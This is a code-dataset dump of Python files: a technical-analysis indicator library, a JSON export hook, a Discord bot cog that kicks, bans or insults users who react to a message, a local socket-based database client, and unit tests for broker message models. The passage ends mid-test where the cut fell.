hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2c96e6d193a2bd12826b74da6401e0f9ad390b78 | 17,132 | py | Python | maldives/technical_analysis/__init__.py | filipecn/maldives | f20f17d817fc3dcad7f9674753744716d1d4c821 | [
"MIT"
] | 1 | 2021-09-17T18:04:33.000Z | 2021-09-17T18:04:33.000Z | maldives/technical_analysis/__init__.py | filipecn/maldives | f20f17d817fc3dcad7f9674753744716d1d4c821 | [
"MIT"
] | null | null | null | maldives/technical_analysis/__init__.py | filipecn/maldives | f20f17d817fc3dcad7f9674753744716d1d4c821 | [
"MIT"
] | 3 | 2021-09-17T18:04:43.000Z | 2022-03-18T20:04:07.000Z | import numpy as np
import math
from pandas import DataFrame
def min_rw_index(prices, start, end):
"""
Searches min price index inside window [start,end]
:param prices: in list format
:param start: window start index
:param end: window end index
:return:
"""
matching_index = start
for i in range(start, end + 1):
if prices[matching_index] > prices[i]:
matching_index = i
return matching_index
def max_rw_index(prices, start, end):
"""
Searches min price index inside window [start,end]
:param prices: in list format
:param start: window start index
:param end: window end index
:return:
"""
matching_index = start
for i in range(start, end + 1):
if prices[matching_index] < prices[i]:
matching_index = i
return matching_index
def get_closest_resistance(values_and_indices, price, current_index):
values = values_and_indices[0]
indices = values_and_indices[1]
value = 10000000
resistance_index = -1
for i in range(len(values)):
avg = np.array(values[i]).mean()
if price <= avg <= value and min(indices[i]) <= current_index:
value = avg
resistance_index = i
return value, resistance_index
def get_closest_support(values_and_indices, price, current_index):
values = values_and_indices[0]
indices = values_and_indices[1]
value = -10000000
support_index = -1
for i in range(len(values)):
avg = np.array(values[i]).mean()
if value <= avg <= price and min(indices[i]) <= current_index:
value = avg
support_index = i
return value, support_index
class TA:
data: DataFrame
def __init__(self, data):
self.data = data.reset_index(drop=False)
def run(self, callback, user_data):
close_prices = self.data["close"].to_list()
for i in range(len(close_prices)):
callback(self, i, close_prices[i], user_data)
# PATTERNS
def candle_directions(self, tail=0):
if tail == 0:
tail = len(self.data['close'])
close_prices = self.data['close'].tail(tail).to_list()
open_prices = self.data['open'].tail(tail).to_list()
colors = tail * [1]
for i in range(tail):
if close_prices[i] < open_prices[i]:
colors[i] = -1
return colors
def reversals(self):
close_prices = self.data['close'].to_list()
open_prices = self.data['open'].to_list()
r = len(close_prices) * [0]
for i in range(2, len(close_prices)):
min_0 = min([open_prices[i - 2], close_prices[i - 2]])
min_1 = min([open_prices[i - 1], close_prices[i - 1]])
min_2 = min([open_prices[i - 0], close_prices[i - 0]])
if min_1 < min_0 and min_1 < min_2:
r[i] = -1
continue
max_0 = min([open_prices[i - 2], close_prices[i - 2]])
max_1 = min([open_prices[i - 1], close_prices[i - 1]])
max_2 = min([open_prices[i - 0], close_prices[i - 0]])
if max_1 > max_0 and max_1 > max_2:
r[i] = 1
return r
# INDICATORS
def resistance_lines(self, resistance_type, threshold=0.02):
"""
Support occurs when falling prices stop, change direction, and begin to
rise. Support is often viewed as a “floor” which is supporting, or
holding up, prices.
Resistance is a price level where rising prices stop, change direction,
and begin to fall. Resistance is often viewed as a “ceiling” keeping
prices from rising higher.
If price breaks support or resistance, the price often continues to the
next level of support or resistance. Support and resistance levels are
not always exact; they are usually a zone covering a small range of prices
so levels can be breached, or pierced, without necessarily being broken.
As a result, support/resistance levels help identify possible points where
price may change directions.
:param resistance_type: 's' for support lines, 'r' for resistance lines
:param threshold:
:return:
"""
values, ids = [], []
open_prices = self.data["open"].to_list()
close_prices = self.data["close"].to_list()
for i in range(1, len(open_prices) - 1):
# find minima/maxima
t_0 = min(open_prices[i - 1], close_prices[i - 1])
t_1 = min(open_prices[i + 0], close_prices[i + 0])
t_2 = min(open_prices[i + 1], close_prices[i + 1])
if resistance_type == 'r':
t_0 = max(open_prices[i - 1], close_prices[i - 1])
t_1 = max(open_prices[i + 0], close_prices[i + 0])
t_2 = max(open_prices[i + 1], close_prices[i + 1])
check = t_1 >= t_0 and t_1 >= t_2
if resistance_type == "s":
check = t_1 <= t_0 and t_1 <= t_2
if check:
# check if this one belongs to past support points
found = False
for j in range(len(values)):
if abs((np.mean(values[j]) - t_1) / t_1) <= threshold:
values[j].append(t_1)
ids[j].append(i)
found = True
break
if not found:
values.append([t_1])
ids.append([i])
return values, ids
def rsi(self, initial_size=14, window_size=14):
"""
The relative strength index (RSI) is most commonly used to indicate
temporarily overbought or oversold conditions in a market.
A market is overbought when the RSI value is over 70 and indicates
oversold conditions when RSI readings are under 30.
A weakness of the RSI is that sudden, sharp price movements can cause
it to spike repeatedly up or down, and, thus, it is prone to giving
false signals. However, if those spikes or falls show a trading
confirmation when compared with other signals, it could signal an entry
or exit point.
:param initial_size:
:param window_size:
:return:
"""
price = self.data["close"].to_list()
gain = len(price) * [0]
loss = len(price) * [0]
for i in range(1, len(price)):
if price[i] > price[i - 1]:
gain[i] = price[i] - price[i - 1]
else:
loss[i] = price[i - 1] - price[i]
average_gain = np.mean(gain[:initial_size + 1])
average_loss = np.mean(loss[:initial_size + 1])
rsi = len(price) * [50]
for i in range(initial_size, len(price)):
average_gain = (average_gain * (window_size - 1) + gain[i]) / window_size
average_loss = (average_loss * (window_size - 1) + loss[i]) / window_size
rs = average_gain
if average_loss != 0:
rs = rs / average_loss
rsi[i] = 100 - 100 / (1 + rs)
return rsi
def bollinger_bands(self, window_size=10, num_of_std=5):
"""
Bollinger Bands are a form of technical analysis that traders
use to plot trend lines that are two standard deviations away
from the simple moving average price of a security. The goal is
to help a trader know when to enter or exit a position by identifying
when an asset has been overbought or oversold.
:param window_size:
:param num_of_std:
:return:
"""
price = self.data["close"]
rolling_mean = price.rolling(window=window_size).mean()
rolling_std = price.rolling(window=window_size).std()
upper_band = rolling_mean + (rolling_std * num_of_std)
lower_band = rolling_mean - (rolling_std * num_of_std)
return rolling_mean, upper_band, lower_band
def regional_locals(self, window_radius=15):
"""
Compute minima and maxima points within a rolling window
:param window_radius: rolling window half size (full size is 2w+1)
:return:
"""
prices = self.data["close"]
maxima = []
minima = []
for i in range(window_radius, len(prices) - window_radius):
if max_rw_index(prices, i - window_radius, i + window_radius) == i:
maxima.append(i)
elif min_rw_index(prices, i - window_radius, i + window_radius) == i:
minima.append(i)
return maxima, minima
def sma(self, window):
"""
Computes the Simple Moving Average given a rolling window size
:param window: window size
:return:
"""
prices = self.data["close"]
return prices.rolling(window=window).mean()
def ema(self, window):
"""
Computes the Exponential Moving Average
:param window:
:return:
"""
prices = self.data["close"]
# return prices.ewm(span=window).mean()
sma_w = self.sma(window)
mod_price = prices.copy()
mod_price.iloc[0:window] = sma_w[0:window]
return mod_price.ewm(span=window, adjust=False).mean()
def mac(self, short_window, long_window, average_type="sma"):
"""
Compute Moving Averages Crossovers
:param short_window:
:param long_window:
:param average_type:
:return:
"""
short = np.array(self.sma(short_window))
long = np.array(self.sma(long_window))
mac = short - long
signal = len(short) * [0]
for i in range(long_window + 1, len(signal)):
if mac[i] > 0 and mac[i - 1] < 0:
signal[i] = 1
elif mac[i] < 0 and mac[i - 1] > 0:
signal[i] = -1
return mac, signal
# MEASURES
def pct_change(self, window_size=1):
prices = self.data["close"]
return prices.pct_change(periods=window_size)
def max_in_range(self, start_index: int = 0, end_index: int = -1):
if end_index < 0:
end_index = len(self.data) - 1
prices = self.data["close"].to_list()
i = max_rw_index(prices, start_index, end_index)
return prices[i], i - start_index
def max_pct_in_range(self, start_index: int = 0, end_index: int = -1):
if end_index < 0:
end_index = len(self.data) - 1
prices = self.data["close"].to_list()
i = max_rw_index(prices, start_index, end_index)
return (prices[i] - prices[start_index]) / prices[start_index] * 100.0, i - start_index
def single_pct_change(self, start_index: int = 0, end_index: int = -1):
if end_index < 0:
end_index = len(self.data) - 1
prices = self.data["close"].to_list()
return (prices[end_index] - prices[start_index]) / prices[start_index] * 100.0
# SIMPLIFICATION
def pips(self, n=5, distance_type="euclidean"):
"""
Finds n Perceptually Important Points(PIPs)
The algorithm starts by characterizing the first and the
last observation as the first two PIPs. Subsequently, it
calculates the distance between all remaining observations
and the two initial PIPs and signifies as the third PIP the
one with the maximum distance.
:param n: total number of pips
:param distance_type: distance type between pips: "euclidean",
"perpendicular" or "vertical"
:return:
"""
def pip_euclidean_distance(xi, xt, xtt, pi, pt, ptt):
return math.sqrt((xt - xi) ** 2 + (pt - pi) ** 2) + math.sqrt((xtt - xi) ** 2 + (ptt - pi) ** 2)
def pip_perpendicular_distance(xi, xt, xtt, pi, pt, ptt):
s = (ptt - pt) / (xtt - xt)
c = pt - xt * s
return abs(s * xi + c - pi) / math.sqrt(s * s + 1)
def pip_vertical_distance(xi, xt, xtt, pi, pt, ptt):
s = (ptt - pt) / (xtt - xt)
c = pt - xt * s
return abs(s * xi + c - pi)
prices = self.data["close"]
pips = [0, len(prices) - 1]
# function to find pip that maximizes the distance between left and right
def pip(left, right):
maximum_distance = 0
maximum_distance_index = 0
for i in range(left + 1, right):
dist = pip_euclidean_distance(i, left, right, prices[i], prices[left], prices[right])
if dist > maximum_distance:
maximum_distance = dist
maximum_distance_index = i
return maximum_distance_index, maximum_distance
# generate pips
while len(pips) < n:
m = 0
mi = 0
for i in range(len(pips) - 1):
if pips[i + 1] - 1 > pips[i]:
mmi, mm = pip(pips[i], pips[i + 1])
if mm > m:
m = mm
mi = mmi
pips.append(mi)
pips.sort()
return pips
def decimate(self, k=18, t=0.5):
"""
:param k:
:param t:
:return:
"""
prices = self.data["close"]
def merge_cost(s1, s2):
cost = 0
A = prices[int(s1[0])]
B = prices[int(s2[1])]
for i in range(s1[0], s2[1] + 1):
a = (i - s1[0]) / (s2[1] - s1[0])
cost = cost + (prices[i] - (a * A + (1 - a) * B)) ** 2
return cost
segments = []
for i in range(int(len(prices) / 2)):
segments.append([i * 2, i * 2 + 1])
costs = (len(segments) - 1) * [0]
for i in range(len(costs)):
costs[i] = merge_cost(segments[i], segments[i + 1])
while len(segments) > len(prices) / k:
minI = min_rw_index(costs, 0, len(costs) - 1)
segments[minI][1] = segments[minI + 1][1]
del segments[minI + 1]
if minI > 0:
costs[minI - 1] = merge_cost(segments[minI - 1], segments[minI])
if len(segments) > minI + 1:
costs[minI] = merge_cost(segments[minI], segments[minI + 1])
if len(costs) - 1 > minI:
del costs[minI + 1]
else:
del costs[minI]
s = []
for i in range(len(segments)):
s.append(segments[i])
if i < len(segments) - 1:
s.append([segments[i][1], segments[i + 1][0]])
changed = True
while changed:
changed = False
# merge trends
for i in range(len(s) - 1):
if (prices[s[i][0]] - prices[s[i][1]]) * (prices[s[i + 1][0]] - prices[s[i + 1][1]]) >= 0:
s[i][1] = s[i + 1][1]
del s[i + 1]
changed = True
break
# fix extremes
for i in range(len(s) - 1):
if prices[s[i][0]] - prices[s[i][1]] < 0:
s[i][1] = s[i + 1][0] = max_rw_index(prices, s[i][0], s[i + 1][1])
else:
s[i][1] = s[i + 1][0] = min_rw_index(prices, s[i][0], s[i + 1][1])
# remove small variation segments
for i in range(len(s)):
if abs(prices[s[i][0]] - prices[s[i][1]]) < t:
changed = True
if i == 0:
s[i + 1][0] = s[i][0]
elif i == len(s) - 1:
s[i - 1][1] = s[i][1]
else:
s[i - 1][1] = s[i + 1][0]
del s[i]
break
l = []
for k in s:
l.append(k[0])
l.append(s[-1][1])
return l
# TODO
def hsars(self, x=0.05, s=2):
"""
Horizontal Support And Resistance levelS
Input are regional locals
:param x: desired percentage that will give the bounds for the HSARs
:param s:
:return:
"""
prices = self.data["close"]
lower_bound = min(prices) / (1 + x / 2)
upper_bound = max(prices) * (1 + x / 2)
# approximate number of bins
approx_n = math.log(upper_bound / lower_bound) / math.log(1 + x)
# actual number of bins
n = int(approx_n + 0.5)
# actual percentage for each bin
actual_pct = (abs(upper_bound / lower_bound)) ** (1 / n) - 1
bounds = []
for i in range(n + 1):
bounds.append((lower_bound * (1 + actual_pct) * i))
freq = len(bounds) * [0]
for p in prices:
for i in range(len(bounds) - 1):
if bounds[i] <= p < bounds[i + 1]:
freq[i] = freq[i] + 1
sar = []
for i in range(len(freq)):
if freq[i] >= s:
sar.append([bounds[i], bounds[i + 1]])
return sar
| 36.451064 | 108 | 0.532279 | 15,434 | 0.900467 | 0 | 0 | 0 | 0 | 0 | 0 | 4,492 | 0.262077 |
2c97a10d31ef8e0bc20d8e7103870b10b184c4ee | 772 | py | Python | cymepy/export_manager/hooks/JSON_writer.py | GMLC-TDC/cymepy | 1f3b6011c674ef24139009fd23bb913e2453bc1d | [
"BSD-3-Clause"
] | 1 | 2021-12-31T06:11:24.000Z | 2021-12-31T06:11:24.000Z | cymepy/export_manager/hooks/JSON_writer.py | GMLC-TDC/cymepy | 1f3b6011c674ef24139009fd23bb913e2453bc1d | [
"BSD-3-Clause"
] | null | null | null | cymepy/export_manager/hooks/JSON_writer.py | GMLC-TDC/cymepy | 1f3b6011c674ef24139009fd23bb913e2453bc1d | [
"BSD-3-Clause"
] | null | null | null | from cymepy.export_manager.base_definations import ExportManager
from cymepy.common import EXPORT_FILENAME
import json
import os
class Writer(ExportManager):
def __init__(self, sim_instance, solver, options, logger, **kwargs):
super(Writer, self).__init__(sim_instance, solver, options, logger, **kwargs)
self.results = []
self.path = os.path.join(
self.settings["project"]['project_path'],
'exports',
f"{EXPORT_FILENAME}.json"
)
pass
def update(self):
results = super().update()
self.results.append(results)
return
def export(self):
with open(self.path, "w") as write_file:
json.dump(self.results, write_file, indent=4, sort_keys=True)
| 30.88 | 85 | 0.638601 | 641 | 0.830311 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.07772 |
2c9d710486fe7c3e74c3841cde67437dfa01eebb | 5,320 | py | Python | fenrir/fenrir.py | noperaattori/Trusty-cogs | 0cca2cf2f6989087441e5304ab085a1a9288097f | [
"MIT"
] | null | null | null | fenrir/fenrir.py | noperaattori/Trusty-cogs | 0cca2cf2f6989087441e5304ab085a1a9288097f | [
"MIT"
] | null | null | null | fenrir/fenrir.py | noperaattori/Trusty-cogs | 0cca2cf2f6989087441e5304ab085a1a9288097f | [
"MIT"
] | null | null | null | import discord
from redbot.core import Config, checks, commands
listener = getattr(commands.Cog, "listener", None) # red 3.0 backwards compatibility support
if listener is None: # thanks Sinbad
def listener(name=None):
return lambda x: x
class Fenrir(commands.Cog):
"""
Various unreasonable commands inspired by Fenrir
"""
__version__ = "1.0.0"
__author__ = "TrustyJAID"
def __init__(self, bot):
self.bot = bot
self.kicks = []
self.bans = []
self.mutes = []
self.feedback = {}
# default_guild = {"kicks": [], "bans":[]}
# self.config = Config.get_conf(self, 228492507124596736)
# self.config.register_guild(**default_guild)
@commands.command()
@checks.admin_or_permissions(kick_members=True)
@commands.guild_only()
async def fenrirkick(self, ctx):
"""Create a reaction emoji to kick users"""
msg = await ctx.send("React to this message to be kicked!")
await msg.add_reaction("✅")
await msg.add_reaction("❌")
self.kicks.append(msg.id)
@commands.command()
@checks.admin_or_permissions(ban_members=True)
@commands.guild_only()
async def fenrirban(self, ctx):
"""Create a reaction emoji to ban users"""
msg = await ctx.send("React to this message to be banned!")
await msg.add_reaction("✅")
await msg.add_reaction("❌")
self.bans.append(msg.id)
@commands.command()
@checks.admin_or_permissions(ban_members=True)
@commands.guild_only()
@commands.check(lambda ctx: ctx.guild.id == 236313384100954113)
async def fenrirmute(self, ctx):
"""Create a reaction emoji to mute users"""
msg = await ctx.send("React to this message to be muted!")
await msg.add_reaction("✅")
await msg.add_reaction("❌")
self.mutes.append(msg.id)
@commands.command(aliases=["fenririnsult"])
@checks.mod_or_permissions(manage_messages=True)
@commands.guild_only()
@commands.check(lambda ctx: ctx.bot.get_cog("Insult"))
async def fenrirfeedback(self, ctx):
"""Create a reaction emoji to insult users"""
msg = await ctx.send("React to this message to be insulted!")
await msg.add_reaction("✅")
await msg.add_reaction("❌")
self.feedback[msg.id] = []
async def is_mod_or_admin(self, member: discord.Member):
guild = member.guild
if member == guild.owner:
return True
if await self.bot.is_owner(member):
return True
if await self.bot.is_admin(member):
return True
if await self.bot.is_mod(member):
return True
if await self.bot.is_automod_immune(member):
return True
return False
@listener()
async def on_raw_reaction_add(self, payload):
try:
guild = self.bot.get_guild(payload.guild_id)
except Exception as e:
print(e)
return
if payload.message_id in self.kicks:
member = guild.get_member(payload.user_id)
if member is None:
return
if member.bot:
return
if await self.is_mod_or_admin(member):
return
try:
await member.kick(reason="They asked for it.")
except Exception:
return
if payload.message_id in self.bans:
member = guild.get_member(payload.user_id)
if member is None:
return
if member.bot:
return
if await self.is_mod_or_admin(member):
return
try:
await member.ban(reason="They asked for it.")
except Exception:
return
if payload.message_id in self.mutes:
member = guild.get_member(payload.user_id)
if member is None:
return
if member.bot:
return
if await self.is_mod_or_admin(member):
return
try:
r = guild.get_role(241943133003317249)
await member.add_roles(r, reason="They asked for it.")
except Exception:
return
if payload.message_id in self.feedback:
if payload.user_id in self.feedback[payload.message_id]:
return
member = guild.get_member(payload.user_id)
if member is None:
return
if member.bot:
return
channel = guild.get_channel(payload.channel_id)
msg = await channel.get_message(payload.message_id)
ctx = await self.bot.get_context(msg)
if await self.is_mod_or_admin(member) or str(payload.emoji) == "🐶":
try:
compliment = self.bot.get_cog("Compliment").compliment
except AttributeError:
compliment = self.bot.get_cog("Insult").insult
await ctx.invoke(compliment, user=member)
else:
insult = self.bot.get_cog("Insult").insult
await ctx.invoke(insult, user=member)
self.feedback[payload.message_id].append(member.id)
| 35 | 93 | 0.578008 | 5,081 | 0.951676 | 0 | 0 | 4,122 | 0.772055 | 3,987 | 0.746769 | 775 | 0.145158 |
2c9e38301a32acb2dc6159e9441fa4c1000f2d7e | 140 | py | Python | my_submission/model/__init__.py | abcdcamey/Gobigger-Explore | 75864164f3e45176a652154147740c34905d1958 | [
"Apache-2.0"
] | 1 | 2021-12-28T02:47:07.000Z | 2021-12-28T02:47:07.000Z | my_submission/model/__init__.py | abcdcamey/Gobigger-Explore | 75864164f3e45176a652154147740c34905d1958 | [
"Apache-2.0"
] | null | null | null | my_submission/model/__init__.py | abcdcamey/Gobigger-Explore | 75864164f3e45176a652154147740c34905d1958 | [
"Apache-2.0"
] | null | null | null | from .gobigger_structed_simple_model import GoBiggerHybridActionSimpleV3
from .my_gobigger_structed_model_v1 import MyGoBiggerHybridActionV1 | 70 | 72 | 0.935714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2ca16bdb7e66900966a36a0cd4986826181aae35 | 1,967 | py | Python | CS307/testbench_log/fileDB/Client.py | ntdgy/python_study | c3511846a89ea72418937de4cc3edf1595a46ec5 | [
"MIT"
] | null | null | null | CS307/testbench_log/fileDB/Client.py | ntdgy/python_study | c3511846a89ea72418937de4cc3edf1595a46ec5 | [
"MIT"
] | null | null | null | CS307/testbench_log/fileDB/Client.py | ntdgy/python_study | c3511846a89ea72418937de4cc3edf1595a46ec5 | [
"MIT"
] | null | null | null | # -*- coding = utf-8 -*-
# @Time: 2022/4/13 19:35
# @Author: Anshang
# @File: Client.py
# @Software: PyCharm
import socket
from multiprocessing import Process, Pipe
def connection(pipe: Pipe, username, password):
ip_bind = ("127.0.0.1", 9900)
c = socket.socket()
c.connect(ip_bind)
login = 'login ' + username + ' ' + password
c.send(bytes(login, encoding='utf-8'))
permission = str(c.recv(1024), encoding="utf-8")
print('permission:', permission)
if permission == '-1':
raise Exception("Login error")
while True:
rec = pipe.recv()
c.send(bytes(rec, encoding="utf-8"))
temp = str(c.recv(1024), encoding="utf-8")
s_send = ''
while temp != 'finish':
s_send = s_send + temp
temp = str(c.recv(1024), encoding="utf-8")
pipe.send(s_send)
class DBMSClient(object):
pa, child = Pipe()
def __init__(self, username, password):
self.p = Process(target=connection, args=(self.child, username, password))
self.p.start()
pass
def execute(self, sql: str):
self.pa.send(sql)
return self.pa.recv()
def excuse(self, sql: str):
self.pa.send(sql)
return self.pa.recv()
def close(self):
self.p.terminate()
self.pa.close()
self.child.close()
if __name__ == '__main__':
client = DBMSClient('anshang', '123456')
client.execute("insert into supply_center(id, director_name) values(2, 'name');")
client.execute("insert into supply_center(id, director_name) values(2, 'test');")
client.execute("insert into supply_center(id, director_name, supply_center) values(5, 'test', 'center');")
client.execute("update supply_center set id = 5, director_name = 'jbjbjb' where id = 2;")
print(
client.execute("select * from supply_center where id = '2' and director_name = 'test' or supply_center = 'center';"))
client.close()
| 31.222222 | 125 | 0.608033 | 491 | 0.249619 | 0 | 0 | 0 | 0 | 0 | 0 | 636 | 0.323335 |
2ca379a4326599a2da6af793ac7003a964e86f56 | 11,677 | py | Python | packages/core/minos-microservice-networks/tests/test_networks/test_brokers/test_messages/test_models/test_v1.py | sorasful/minos-python | 1189330eebf6444627a2af6b29f347670f95a4dd | [
"MIT"
] | 247 | 2022-01-24T14:55:30.000Z | 2022-03-25T12:06:17.000Z | packages/core/minos-microservice-networks/tests/test_networks/test_brokers/test_messages/test_models/test_v1.py | sorasful/minos-python | 1189330eebf6444627a2af6b29f347670f95a4dd | [
"MIT"
] | 168 | 2022-01-24T14:54:31.000Z | 2022-03-31T09:31:09.000Z | packages/core/minos-microservice-networks/tests/test_networks/test_brokers/test_messages/test_models/test_v1.py | sorasful/minos-python | 1189330eebf6444627a2af6b29f347670f95a4dd | [
"MIT"
] | 21 | 2022-02-06T17:25:58.000Z | 2022-03-27T04:50:29.000Z | import unittest
import warnings
from unittest.mock import (
patch,
)
from uuid import (
UUID,
uuid4,
)
from minos.common import (
Model,
)
from minos.networks import (
BrokerMessageV1,
BrokerMessageV1Payload,
BrokerMessageV1Status,
BrokerMessageV1Strategy,
)
from tests.utils import (
FakeModel,
)
class TestBrokerMessageV1(unittest.TestCase):
def setUp(self) -> None:
self.topic = "FooCreated"
self.identifier = uuid4()
self.reply_topic = "AddOrderReply"
self.strategy = BrokerMessageV1Strategy.MULTICAST
self.payload = BrokerMessageV1Payload(
content=[FakeModel("blue"), FakeModel("red")], headers={"foo": "bar"}, status=BrokerMessageV1Status.ERROR
)
def test_constructor_simple(self):
message = BrokerMessageV1(self.topic, self.payload)
self.assertEqual(self.topic, message.topic)
self.assertIsInstance(message.identifier, UUID)
self.assertEqual(None, message.reply_topic)
self.assertEqual(BrokerMessageV1Strategy.UNICAST, message.strategy)
self.assertEqual(self.payload, message.payload)
def test_constructor(self):
message = BrokerMessageV1(
self.topic,
identifier=self.identifier,
reply_topic=self.reply_topic,
strategy=self.strategy,
payload=self.payload,
)
self.assertEqual(self.topic, message.topic)
self.assertEqual(self.identifier, message.identifier)
self.assertEqual(self.reply_topic, message.reply_topic)
self.assertEqual(self.strategy, message.strategy)
self.assertEqual(self.payload, message.payload)
def test_version(self):
self.assertEqual(1, BrokerMessageV1.version)
def test_topic(self):
message = BrokerMessageV1(self.topic, self.payload)
self.assertEqual(self.topic, message.topic)
def test_identifier(self):
message = BrokerMessageV1(self.topic, self.payload, identifier=self.identifier)
self.assertEqual(self.identifier, message.identifier)
def test_reply_topic(self):
message = BrokerMessageV1(self.topic, self.payload, reply_topic=self.reply_topic)
self.assertEqual(self.reply_topic, message.reply_topic)
def test_set_reply_topic(self):
message = BrokerMessageV1(self.topic, self.payload)
self.assertIsNone(message.reply_topic)
message.set_reply_topic(self.reply_topic)
self.assertEqual(self.reply_topic, message.reply_topic)
def test_ok(self):
message = BrokerMessageV1(self.topic, self.payload)
self.assertEqual(self.payload.ok, message.ok)
def test_status(self):
message = BrokerMessageV1(self.topic, self.payload)
self.assertEqual(self.payload.status, message.status)
def test_headers(self):
message = BrokerMessageV1(self.topic, self.payload)
self.assertEqual(self.payload.headers, message.headers)
def test_content(self):
message = BrokerMessageV1(self.topic, self.payload)
self.assertEqual(self.payload.content, message.content)
def test_data(self):
message = BrokerMessageV1(self.topic, self.payload)
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
# noinspection PyDeprecation
self.assertEqual(self.payload.content, message.data)
def test_avro(self):
message = BrokerMessageV1(
self.topic,
identifier=self.identifier,
reply_topic=self.reply_topic,
strategy=self.strategy,
payload=self.payload,
)
observed = BrokerMessageV1.from_avro_bytes(message.avro_bytes)
self.assertEqual(message, observed)
def test_sort(self):
unsorted = [
BrokerMessageV1("", BrokerMessageV1Payload("foo")),
BrokerMessageV1("", BrokerMessageV1Payload(4)),
BrokerMessageV1("", BrokerMessageV1Payload(2)),
BrokerMessageV1("", BrokerMessageV1Payload(3)),
BrokerMessageV1("", BrokerMessageV1Payload(1)),
BrokerMessageV1("", BrokerMessageV1Payload("bar")),
]
expected = [unsorted[0], unsorted[4], unsorted[2], unsorted[3], unsorted[1], unsorted[5]]
observed = sorted(unsorted)
self.assertEqual(expected, observed)
def test_from_avro(self):
expected = BrokerMessageV1(self.topic, self.payload, identifier=self.identifier)
schema = {
"fields": [
{"name": "topic", "type": "string"},
{"name": "identifier", "type": {"logicalType": "uuid", "type": "string"}},
{"name": "reply_topic", "type": ["string", "null"]},
{
"name": "strategy",
"type": {
"logicalType": "minos.networks.brokers.messages.models.v1.BrokerMessageV1Strategy",
"type": "string",
},
},
{
"name": "payload",
"type": {
"fields": [
{
"name": "content",
"type": {
"items": {
"fields": [{"name": "data", "type": "string"}],
"name": "FakeModel",
"namespace": "tests.utils.hello",
"type": "record",
},
"type": "array",
},
},
{
"name": "status",
"type": {
"logicalType": "minos.networks.brokers.messages.models.v1.BrokerMessageV1Status",
"type": "int",
},
},
{"name": "headers", "type": {"type": "map", "values": "string"}},
],
"name": "BrokerMessageV1Payload",
"namespace": "minos.networks.brokers.messages.models.v1.hello",
"type": "record",
},
},
{"name": "version", "type": "int"},
],
"name": "BrokerMessage",
"namespace": "minos.networks.brokers.messages.models.abc.hello",
"type": "record",
}
data = {
"identifier": str(self.identifier),
"payload": {"content": [{"data": "blue"}, {"data": "red"}], "headers": {"foo": "bar"}, "status": 400},
"reply_topic": None,
"strategy": "unicast",
"topic": "FooCreated",
"version": 1,
}
observed = Model.from_avro(schema, data)
self.assertEqual(expected, observed)
def test_avro_schema(self):
schema = {
"fields": [
{"name": "topic", "type": "string"},
{"name": "identifier", "type": {"logicalType": "uuid", "type": "string"}},
{"name": "reply_topic", "type": ["string", "null"]},
{
"name": "strategy",
"type": {
"logicalType": "minos.networks.brokers.messages.models.v1.BrokerMessageV1Strategy",
"type": "string",
},
},
{
"name": "payload",
"type": {
"fields": [
{
"name": "content",
"type": {
"items": {
"fields": [{"name": "data", "type": "string"}],
"name": "FakeModel",
"namespace": "tests.utils.hello",
"type": "record",
},
"type": "array",
},
},
{
"name": "status",
"type": {
"logicalType": "minos.networks.brokers.messages.models.v1.BrokerMessageV1Status",
"type": "int",
},
},
{"name": "headers", "type": {"type": "map", "values": "string"}},
],
"name": "BrokerMessageV1Payload",
"namespace": "minos.networks.brokers.messages.models.v1.hello",
"type": "record",
},
},
{"name": "version", "type": "int"},
],
"name": "BrokerMessage",
"namespace": "minos.networks.brokers.messages.models.abc.hello",
"type": "record",
}
with patch("minos.common.AvroSchemaEncoder.generate_random_str", return_value="hello"):
observed = BrokerMessageV1(self.topic, self.payload).avro_schema
self.assertEqual([schema], observed)
def test_avro_data(self):
expected = {
"identifier": str(self.identifier),
"payload": {"content": [{"data": "blue"}, {"data": "red"}], "headers": {"foo": "bar"}, "status": 400},
"reply_topic": None,
"strategy": "unicast",
"topic": "FooCreated",
"version": 1,
}
observed = BrokerMessageV1(self.topic, self.payload, identifier=self.identifier).avro_data
self.assertEqual(expected, observed)
def test_avro_bytes(self):
expected = BrokerMessageV1(self.topic, self.payload)
self.assertEqual(expected, Model.from_avro_bytes(expected.avro_bytes))
class TestBrokerMessagePayload(unittest.TestCase):
def setUp(self) -> None:
self.content = [FakeModel("blue"), FakeModel("red")]
def test_ok(self):
self.assertTrue(BrokerMessageV1Payload(self.content, status=BrokerMessageV1Status.SUCCESS).ok)
self.assertFalse(BrokerMessageV1Payload(self.content, status=BrokerMessageV1Status.ERROR).ok)
self.assertFalse(BrokerMessageV1Payload(self.content, status=BrokerMessageV1Status.SYSTEM_ERROR).ok)
self.assertFalse(BrokerMessageV1Payload(self.content, status=BrokerMessageV1Status.UNKNOWN).ok)
def test_data(self):
payload = BrokerMessageV1Payload(self.content)
with warnings.catch_warnings():
